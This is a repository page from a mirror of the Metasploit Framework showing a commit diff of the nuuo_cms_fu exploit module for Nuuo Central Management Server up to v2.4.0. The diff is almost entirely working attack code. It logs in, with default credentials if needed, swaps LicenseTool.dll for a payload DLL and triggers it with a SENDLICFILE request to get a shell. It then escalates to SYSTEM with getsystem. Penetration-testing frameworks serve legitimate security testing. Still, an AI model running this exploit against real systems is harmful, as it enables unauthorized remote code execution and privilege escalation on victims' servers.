infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Minor updates 

exploit:nuuo_cms_fu
GSoC/Meterpreter_Web_Console
Jacob Robles 2019-02-19 05:48:54 -06:00
parent 9070435603
commit 2b71410807
No known key found for this signature in database
GPG Key ID: 3EC9F18F2B12401C
1 changed files with 26 additions and 22 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

48
modules/exploits/windows/nuuo/nuuo_cms_fu.rb
View File

@ -24,6 +24,10 @@ class MetasploitModule < Msf::Exploit::Remote
This module will either use a provided session number (which can be guessed with an auxiliary
module) or attempt to login using a provided username and password - it will also try the
default credentials if nothing is provided.
This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module
fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will
not execute successfully.
},
'License' => MSF_LICENSE,
'Author' =>
@ -44,57 +48,57 @@ class MetasploitModule < Msf::Exploit::Remote
[ 'Nuuo Central Management Server <= v2.4.0', {} ],
],
'Privileged' => true,
'DisclosureDate' => "Oct 11 2018",
'DisclosureDate' => 'Oct 11 2018',
'DefaultTarget' => 0))
end
def on_new_session(client)
if client.type == "meterpreter"
print_warning("Please wait a bit while we clean up")
if client.type == 'meterpreter'
print_warning('Please wait a bit while we clean up')
client.sys.process.get_processes().each do |proc|
if proc['name'] == "NCS_Server.exe"
if proc['name'] == 'NCS_Server.exe'
client.sys.process.kill(proc['pid'])
sleep 5
Rex.sleep(5)
client.shell_command_token("move /y #{@dll} LicenseTool.dll")
client.sys.process.execute("NCS_Server.exe")
print_good("Successfully restored LicenseTool.dll!")
client.sys.process.execute('NCS_Server.exe')
print_good('Successfully restored LicenseTool.dll!')
end
end
# elevate privs to system (we're already Admin anyway), and we're done!
client.run_cmd("getsystem")
print_good("We should have SYSTEM now, enjoy your shell!")
client.run_cmd('getsystem')
print_good('We should have SYSTEM now, enjoy your shell!')
else
print_error("You are not using meterpreter, so we are unable to restore LicenseTool.dll")
print_error('You are not using meterpreter, so we are unable to restore LicenseTool.dll')
print_error("To restore it, kill the NCS_Server.exe process and copy <CMS_FOLDER>\\#{@dll} to <CMS_FOLDER>\\LicenseTool.dll")
print_error("... otherwise the Nuuo CMS installation will be nuked!")
print_good("Anyway, enjoy your shell!")
print_error('... otherwise the Nuuo CMS installation will be nuked!')
print_good('Anyway, enjoy your shell!')
end
end
def exploit
nucs_login
if @nucs_session == nil
fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS")
unless @nucs_session
fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS')
end
# Download and upload a backup of LicenseTool.dll, so that we can restore it at post
# and not nuke the CMS installation.
@dll = rand_text_alpha(12)
print_status("Backing up LicenseTool.dll to #{@dll}")
dll_data = nucs_download_file("LicenseTool.dll")
dll_data = nucs_download_file('LicenseTool.dll')
nucs_upload_file(@dll, dll_data)
print_status("Uploading payload...")
nucs_upload_file("LicenseTool.dll", generate_payload_dll)
print_status('Uploading payload...')
nucs_upload_file('LicenseTool.dll', generate_payload_dll)
print_status("Sleeping 15 seconds...")
sleep 15
print_status('Sleeping 15 seconds...')
Rex.sleep(15)
print_status("Sending SENDLICFILE request, shell incoming!")
print_status('Sending SENDLICFILE request, shell incoming!')
license_data = rand_text_alpha(50..350)
nucs_send_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
"Content-Length: " + license_data.length.to_s], license_data)
nucs_send_msg(['SENDLICFILE', "FileName: #{rand_text_alpha(3..11)}.lic",
'Content-Length: ' + license_data.length.to_s], license_data)
end
end